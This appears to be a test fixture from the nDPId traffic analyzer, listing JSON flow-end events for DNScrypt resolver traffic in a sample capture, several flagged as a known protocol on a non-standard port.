+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304361,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317463,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348912,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400520,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305384,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400518,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396215,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305218,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312407,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304810,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305328,"flow_last_seen":946739305354,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312399,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318175,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337183,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304397,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318170,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318168,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304788,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
